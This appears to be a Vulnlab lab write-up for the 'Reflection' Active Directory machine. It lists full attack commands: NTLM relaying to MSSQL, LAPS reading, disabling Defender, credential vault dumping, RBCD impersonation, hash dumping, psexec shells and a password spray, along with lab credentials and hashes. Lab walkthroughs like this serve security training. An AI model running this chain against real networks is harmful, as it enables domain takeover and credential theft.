# Vulnlab - Reflection
# NMAP
## DC01.reflection.vl
```bash
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-08-13 18:24:44Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-08-13T18:26:16+00:00; -1s from scanner time.
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62571/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```
## MS01.reflection.vl
```bash
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2023-08-13 21:52:56 PKT for 264s
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
|_ssl-date: 2023-08-13T16:57:16+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ms01.reflection.vl
5985/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
```
## WS01.reflection.vl
```bash
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2023-08-13 21:52:56 PKT for 264s
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
| ssl-cert: Subject: commonName=ws01.reflection.vl
```
## PORT 445 (SMB)
Enumerating the smb shares from the machines, we only get list of shares with null authentication on `MS01`
Accessing `staging` share we'll get `staging_db.conf` file having credentials
With `crackmapexec` we can try to authenticate on smb to verify if these are valid credentials
```bash
cme smb hosts.txt -u 'web_staging' -p 'Washroom510'
```
We can try authenticating over MSSQL as that service is running on DC01 and MS01
```bash
cme mssql hosts.txt -u 'web_staging' -p 'Washroom510' --local-auth
```
We get a vaild login so we can proceed with using `mssqlclient.py` from impacket
```bash
mssqlclient.py web_staging:'Washroom510'@10.10.173.134
```
Since `xp_cmdshell` was not allowed for this user
We can try using `xp_dirtree` to coerce the server to our machine in order to retrieve NTLMv2 hash of service account of mssql
But cracking this hash didn't worked as well
So we can't crack this hash, maybe we can relay as smb signing is disabled
With `ntlmrelayx.py` we can realy the hash and authenticate
It shows that relaying on smb worked, we can also try to relay it on mssql running on DC01 which will allow us to execute queries as `svc_web_staging`
```bash
ntlmrelayx.py -t mssql://10.10.173.133 -smb2support --query 'SELECT @@version'
```
We can enumerate the databases, as here's there's one called `prod`
```bash
ntlmrelayx.py -t mssql://10.10.132.133 -smb2support --query 'SELECT name FROM master.dbo.sysdatabases;'
```
But listing the tables in that database didn't worked as this user doesn't have access , trying to enable xp_cmdshell didn't worked here as well
So there was nothing we could do from here but as saw previously that svc_web_staging was able to authenticate smb we can list shares and try to access shares from DC01, for this we need to use socks proxy as it's going to keep the smb connection open and also lists the relays which were successful
```bash
ntlmrelayx.py -tf hosts.txt -smb2support -socks
```
It does show that this user is not an admin but still we can access the smb shares as a domain user with `smbclient`
To my surprise this didn't worked and I don't know the reason, maybe it's an issue with my version of smbclient but with smbclient.py from impacket worked like a charm
```bash
proxychains smbclient.py reflection/svc_web_staging@10.10.132.133
```
From `prod` share we can grab `prod_db.conf`
'
Having the credentials for the production, we can enumerate the database
```powershell
mssqlclient.py web_prod:Tribesman201@10.10.132.133
```
From the `users` table we'll get set of two credentials
On verifying these credentials, both of them are domain users
So now we can enumerate the domain with `bloodhound` , before doing that make sure to edit the hosts file for dc01.reflection.vl entry
```bash
python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'reflection.vl' -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' -ns 10.10.132.133 -c all
```
From bloodhound we see these two users are part of Staff group
But Staff group didn't had any ACLs, abbie had `GenericAll` on `MS01`
Unfortunately we can't just add a computer object as there's 0 machine quota
However, since we have GenericAll, we can read LAPS on MS01 which is a randomized password for local administrator
```bash
cme smb 10.10.132.134 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' --laps
```
```bash
evil-winrm -i 10.10.132.134 -u 'administrator' -p 'H447.++h6g5}xi'
```
Disabling the defender with `Set-MpPreference -DisableRealtimeMonitoring $true`
Uploading netcat and getting a shell again as evil-winrm was causing an issue with mimikatz
From the cache, we see `Georgia.Price`
With `vault::cred /patch` we can list the credentials from the credential vault
Going back to bloodhound, this user also has `GenericAll` on `WS01`
We know that there's no machine quota available but we do have access to MS01, we can add that machine in WS01's `msDS-AllowedToActOnBehalfOfOtherIdentity` property, for this we need to get the NThash of MS01
Editing the `msDS-AllowedToActOnBehalfOfOtherIdentity` with `rbcd.py` from impacket
```bash
rbcd.py -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.188.197 "Reflection/Georgia.Price:DBl+5MPkpJg5id"
```
After adding the property, we can impersonate the administrator ticket on WS01 with `getST.py`
```bash
getST.py -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.188.197 'Reflection/MS01$' -hashes ':6e77d4ac157a47c5581681b8f865677e'
```
And now we can dump hashes from WS01
```bash
secretsdump.py administrator@WS01.reflection.vl -k -no-pass
```
Since defender was enable on WS01 we couldn't get a shell through psexec.py
We can however use `atexec.py` to schedule the commands to be executed in order disable defender
```bash
atexec.py ws01/administrator@10.10.188.199 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02'
```
After this, we'll be able to use psexec to get a shell
```bash
psexec.py administrator@WS01.reflection.vl -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02'
```
As we already dumped hashes, we have Rhys.Garner's password who is a local admin on WS01, this user didn't had any ACLs on any object, checking the domain admins, there are 2 domain admins
We can try spraying the password on them to see if we can get access to those users
Which worked on `DOM_RGARNER`, with this we can login on DC01 through winrm and become domain admin
# References
- https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
- https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
- https://tools.thehacker.recipes/impacket/examples/atexec.py